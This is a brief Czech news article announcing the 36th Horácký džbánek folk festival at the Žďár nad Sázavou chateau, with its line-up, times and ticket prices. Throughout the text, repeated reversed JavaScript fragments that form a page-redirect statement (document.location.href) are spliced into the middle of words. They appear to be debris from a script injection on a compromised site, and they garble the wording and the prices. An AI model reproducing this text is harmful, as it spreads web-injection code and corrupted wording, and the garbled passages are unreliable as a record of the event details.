Rainbow page separator

V zámku se uskuteční Horácký džbánek, už po šestatřicáté

Čtvrtek, 9. srpna 2018

Žďár nad Sázavou / V pořadí už šestatřicátý ročník hudebního festivalu Horácký džbánek se v pátek 10. a v sobotu 11. srpna odehraje ve žďárském zámku; pořádá ho Kultura Žďár.
V pátek 10. srpna v 17 hodin tradiční akce začne vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupením uskupení Malina Brother. Pak přijde na řadu písničkář Aleš Petržela, Pavel Lohonka Žalman a kapela Lokálka. Festivalem bude le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos provázet Luděk Savana Urbánek z rádia Signál Brno. V sobotu se hudební fanoušci sejdou na nádvoří žďárského zámku od 14 hodin a těšit se mohou na Nezmary, Folk Team, Lauru a její tygry, písničkářku Martinu Trchovou, formaci Ukulele Troublemakers i legendární Fleret.

Vstupenky na Horácký džbánek jsou k dispozici v předprodeji – na pátek vstupné vyjde na 280 korun, sobota s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojí 300 na osobu a dvoudenní vstupné vychází na pětis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovku. V den konání akce jsou vstupenky o něco dražší – na pátek s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojí tři s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovky, na sobotu 350 korun a dvoudenní je za 550 korun za osobu.